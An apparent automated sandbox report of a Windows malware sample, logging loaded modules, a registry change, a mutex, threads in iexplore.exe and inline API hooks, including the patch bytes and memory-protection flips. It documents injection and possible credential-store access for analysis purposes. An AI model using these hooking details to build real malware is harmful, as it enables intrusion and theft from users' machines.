C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE query and read commit 81B0000 10084352 own pid readonly success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE query and read commit 81B0000 10084352 own pid readonly success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE query and read commit 81B0000 10084352 own pid readonly success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE query and read commit 81B0000 10084352 own pid readonly success or wait 1
\BaseNamedObjects\Global\RotHintTable read unknown 7FD0000 4096 own pid readonly success or wait 1
unknown query and write and read commit 7FE0000 4096 own pid read write success or wait 1
unknown query and write and read commit 7FE0000 4096 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120120111202_index.dat_16384 write unknown 7FE0000 4096 own pid read write object name not found 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120120111202_index.dat_16384 query and write and read commit 7FE0000 16384 own pid read write success or wait 1
unknown query and write and read commit 7FF0000 4096 own pid read write success or wait 1
unknown query and write and read commit 7FE0000 4096 own pid read write success or wait 1
unknown query and write and read commit 7FE0000 4096 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120220111203_index.dat_32768 write unknown 7FE0000 32768 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_16384 write unknown 7FE0000 32768 own pid read write object name not found 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_16384 query and write and read commit 7FF0000 16384 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_32768 write unknown 7FF0000 16384 own pid read write object name not found 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_32768 query and write and read commit 7FF0000 32768 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid read write success or wait 1
unknown query and write and read commit 7FE0000 4096 own pid read write success or wait 1
unknown query and write and read commit 7FE0000 4096 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_16384 write unknown 7FE0000 4096 own pid read write object name not found 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_16384 query and write and read commit 7FE0000 16384 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_32768 write unknown 7FE0000 16384 own pid read write object name not found 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_32768 query and write and read commit 7FE0000 32768 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid readonly success or wait 1
unknown query and write and read commit 8000000 4096 own pid readonly success or wait 1
unknown query and write and read commit 8000000 4096 own pid readonly success or wait 1
unknown query and write and read commit 8000000 4096 own pid readonly success or wait 1
unknown query and write and read commit 8000000 4096 own pid read write success or wait 1
\BaseNamedObjects\ASMWIN0 write and read unknown 8000000 4096 own pid read write success or wait 1
\BaseNamedObjects\ASMWIN1 write and read unknown 8000000 4096 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid read write success or wait 1
unknown query and write and read commit 8000000 4096 own pid readonly success or wait 1
\BaseNamedObjects\ASMWIN2 write and read unknown 8000000 4096 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\nio.dll write and read and execute commit 8000000 40960 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\nio.dll query and write and read and execute image 6D4E0000 36864 own pid read write success or wait 1
C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe query and write and read and execute and extend size image 6D4E0000 36864 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 8100000 1208320 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe query and read commit 8100000 258048 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and write and read and execute and extend size image 8100000 258048 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 8100000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 8230000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 8230000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 8240000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 8230000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 8100000 12288 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Desktop\0.3635417184612467.exe query and write and read and execute and extend size image 8100000 12288 own pid readonly invalid file for section 1
C:\WINDOWS\system32\regsvr32.exe query and write and read and execute and extend size image 8100000 12288 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 8100000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 8230000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 8230000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 8230000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 8100000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 8100000 12288 own pid readonly success or wait 1
\BaseNamedObjects\MSCTF.Shared.SFM.MMB query and write and read reserve 8100000 524288 own pid read write success or wait 1
unknown query and write and read commit 82A0000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\msoeacct.dll write and read and execute commit 82A0000 253952 own pid execute success or wait 1
C:\WINDOWS\system32\msoeacct.dll write and read and execute commit 82A0000 253952 own pid execute success or wait 1
C:\WINDOWS\system32\msoeacct.dll query and write and read and execute image 68810000 270336 own pid read write success or wait 1
\KnownDlls\MSOERT2.dll write and read and execute unknown 68810000 270336 own pid read write object name not found 1
C:\WINDOWS\system32\msoert2.dll query and write and read and execute image 76880000 139264 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 82B0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 82B0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 82B0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 82D0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 82D0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 82D0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\acctres.dll write and read and execute commit 82D0000 65536 own pid execute success or wait 1
C:\WINDOWS\system32\acctres.dll write and read and execute commit 82D0000 65536 own pid execute success or wait 1
C:\WINDOWS\system32\acctres.dll query and write and read and execute image 71780000 73728 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit 82F0000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit 82F0000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll query and write and read and execute image 470D0000 528384 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit 82F0000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit 82F0000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll query and write and read and execute image 35F40000 258048 own pid read write success or wait 1
unknown query and write and read commit 82D0000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\msident.dll write and read and execute commit 82D0000 53248 own pid execute success or wait 1
C:\WINDOWS\system32\msident.dll write and read and execute commit 82D0000 53248 own pid execute success or wait 1
C:\WINDOWS\system32\msident.dll query and write and read and execute image 608A0000 61440 own pid read write success or wait 1
C:\WINDOWS\system32\msident.dll read commit 82D0000 53248 own pid readonly success or wait 1
C:\WINDOWS\system32\msidntld.dll write and read and execute commit 82D0000 16384 own pid execute success or wait 1
C:\WINDOWS\system32\msidntld.dll write and read and execute commit 82D0000 16384 own pid execute success or wait 1
C:\WINDOWS\system32\msidntld.dll query and write and read and execute image 60890000 24576 own pid read write success or wait 1
\KnownDlls\PSTOREC.DLL write and read and execute unknown 60890000 24576 own pid read write object name not found 1
C:\WINDOWS\system32\pstorec.dll query and write and read and execute image 5E0C0000 53248 own pid read write success or wait 1
\KnownDlls\ATL.DLL write and read and execute unknown 5E0C0000 53248 own pid read write object name not found 1
C:\WINDOWS\system32\atl.dll query and write and read and execute image 76B20000 69632 own pid read write success or wait 1
unknown query and write and read commit C40000 12288 own pid read write success or wait 1
\BaseNamedObjects\ASMWIN0 query and write and read commit C40000 12288 own pid read write success or wait 1
unknown query and write and read commit CB0000 12288 own pid read write success or wait 1
Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
Registry Activities:
+ Key value replaced with new
Key Path Name Type Old Data New Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 Dword -1521036860 -1521036924 success or wait 1 8005F0A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Enabled object name not found 1 8005EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell EnabledV8 success or wait 1 8005EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell CleanCookies success or wait 1 8005FBA
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell CleanCookies success or wait 1 8005EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell 1406 success or wait 5 8005EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell 1609 success or wait 5 8005EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 success or wait 1 8005F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 success or wait 1 8005F7A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Account Manager\Accounts NULL success or wait 1 8005EB7
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} object name exists 1 8020DFC
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
1276 1712 7C8106F9 false C:\Program Files\Internet Explorer\iexplore.exe success or wait 1 8018106
2128 1712 7C8106F9 false C:\Program Files\Internet Explorer\iexplore.exe success or wait 1 8018106
2736 1712 7C8106F9 false C:\Program Files\Internet Explorer\iexplore.exe success or wait 1 8018106
2812 1712 7C8106F9 false C:\Program Files\Internet Explorer\iexplore.exe success or wait 1 8018106
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212EBC 30 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C60A1 30 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771CE9C1 30 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212FC1 30 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C4D8C 30 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C82EA 30 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9100 30 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D89F7 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C79C2 30 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9C53 30 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D9064 30 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 771BB1D8 30 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB676F 30 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB4CB5 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 801F078
1712 C:\Program Files\Internet Explorer\iexplore.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 801F078
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190000 10 B8 35 00 00 00 E9 A9 D1 77 74 success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C90D1AE 5 E9 A4 AE 70 8B success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 819000A 10 68 6C 02 00 00 E9 1E 63 78 74 success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C91632D 5 E9 09 1F 70 8B success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190014 10 8B FF 55 8B EC E9 A3 2E 08 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212EBC 5 E9 FD 4B DF 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 819001E 10 8B FF 55 8B EC E9 7E 60 03 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C60A1 5 E9 6F 1A E4 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190028 10 8B FF 55 8B EC E9 94 E9 03 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771CE9C1 5 E9 A6 91 E3 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190032 10 8B FF 55 8B EC E9 8A 2F 08 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212FC1 5 E9 4B 4C DF 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 819003C 10 8B FF 55 8B EC E9 4B 4D 03 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C4D8C 5 E9 25 2F E4 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190046 10 8B FF 55 8B EC E9 9F 82 03 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C82EA 5 E9 0A FA E3 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190050 10 8B FF 55 8B EC E9 AB 90 06 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9100 5 E9 34 EC E0 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 819005A 10 8B FF 55 8B EC E9 98 89 04 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D89F7 5 E9 8B F3 E2 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190064 12 6A 2C 68 10 7B 1C 77 E9 59 79 03 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C79C2 5 E9 F0 03 E4 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190070 10 8B FF 55 8B EC E9 DE 9B 06 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9C53 5 E9 B4 E1 E0 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 819007A 10 8B FF 55 8B EC E9 E5 8F 04 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D9064 5 E9 BB ED E2 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190084 10 8B FF 55 8B EC E9 4F B1 02 6F success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 771BB1D8 5 E9 5F CC E4 90 success or wait 1 801F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 819008E 10 8B FF 55 8B EC E9 98 3D 92 69 success or wait 1 801F0EC
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB3E2B 5 E9 3E E9 55 96 success or wait 1 801F11A
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1712 C:\Program Files\Internet Explorer\iexplore.exe 8080000 807F8C8 page read and write success or wait 1 801A5EB
1712 C:\Program Files\Internet Explorer\iexplore.exe 8080000 807F8CC page read and write success or wait 1 801A5EB
1712 C:\Program Files\Internet Explorer\iexplore.exe 8190000 807F4C0 page execute and read and write success or wait 1 8023FCB
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212EBC 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212EBC 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C60A1 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C60A1 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771CE9C1 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771CE9C1 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212FC1 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 77212FC1 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C4D8C 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C4D8C 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C82EA 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C82EA 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9100 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9100 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D89F7 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D89F7 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C79C2 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771C79C2 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9C53 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771F9C53 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D9064 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771D9064 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 771BB1D8 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 771BB1D8 1000 page execute read page execute and read and write success or wait 1 801F134
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB3E2B 1000 page execute and read and write page execute read success or wait 1 801F04F
1712 C:\Program Files\Internet Explorer\iexplore.exe 71AB3E2B 1000 page execute read page execute and read and write success or wait 1 801F134
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 4 8028879
User Activities:
+ Window enumerated
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address
0 0 false 1CC 3011a, 30114, 1, 100b8, 100b6, 1, 64415c73, 696e696d, 61727473, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 1 6C35FF6D
0 0 false 1CC 3011a, 30114, 1, 901aa, 5015c, 50174, 5015e, 3016e, 1, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 1 21F180
0 0 false 4FC 5029c, 801d6, 1, 901aa, 5015c, 50174, 5015e, 3016e, 1, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 4 8019AFD
0 0 false 4FC 5029c, 1, 530049, 520054, 5c0059, 530055, 520045, 53005c, 31002d, 35002d, 32002d, 2d0031, 300035, 390037, 310032 success or wait 1 8019AFD
0 0 false 6C8 50122, 400c0, 30132, 30130, 30166, 60176, 30116, 400e0, 5013a, 40134, 60104, 30146, 50102, 700f8, 900fe success or wait 2 8019D36
0 0 false 1CC 3011a, 30114, 1, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1 success or wait 3 27B3130
0 0 false 6C8 400c0, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 60108, 1 success or wait 6 1AF2810
0 0 false 6C8 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 2 F43F38
0 0 false 6C8 40134, 30146, 90112, 60108, 1, 1, 1, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 4 402372
+ Chronological sections
Operation Data Completion Time
Section loaded Path: C:\WINDOWS\system32\jscript.dll Access: write and read and execute Type: commit Baseaddress: 2340000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 2421972386
Section loaded Path: C:\WINDOWS\system32\jscript.dll Access: query and write and read and execute Type: image Baseaddress: 75C50000 Size: 512000 Protection: read write Mapped to pid: own pid success or wait 2421976963
Section loaded Path: C:\WINDOWS\system32\mshtml.tlb Access: query and read Type: commit Baseaddress: 3A60000 Size: 1351680 Protection: readonly Mapped to pid: own pid success or wait 2491329874
Section loaded Path: C:\WINDOWS\system32\msxml3.dll Access: write and read and execute Type: commit Baseaddress: 3BB0000 Size: 1175552 Protection: execute Mapped to pid: own pid success or wait 2491383507
Section loaded Path: C:\WINDOWS\system32\msxml3.dll Access: query and write and read and execute Type: image Baseaddress: 74980000 Size: 1191936 Protection: read write Mapped to pid: own pid success or wait 2491395358
Section loaded Path: C:\WINDOWS\system32\msxml3r.dll Access: write and read and execute Type: commit Baseaddress: 4080000 Size: 45056 Protection: execute Mapped to pid: own pid success or wait 2491503559
Section loaded Path: C:\WINDOWS\system32\msxml3r.dll Access: query and read Type: commit Baseaddress: 4080000 Size: 45056 Protection: readonly Mapped to pid: own pid success or wait 2491506195
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\JavaWebStart.dll Access: write and read and execute Type: commit Baseaddress: 4090000 Size: 139264 Protection: execute Mapped to pid: own pid success or wait 2491573133
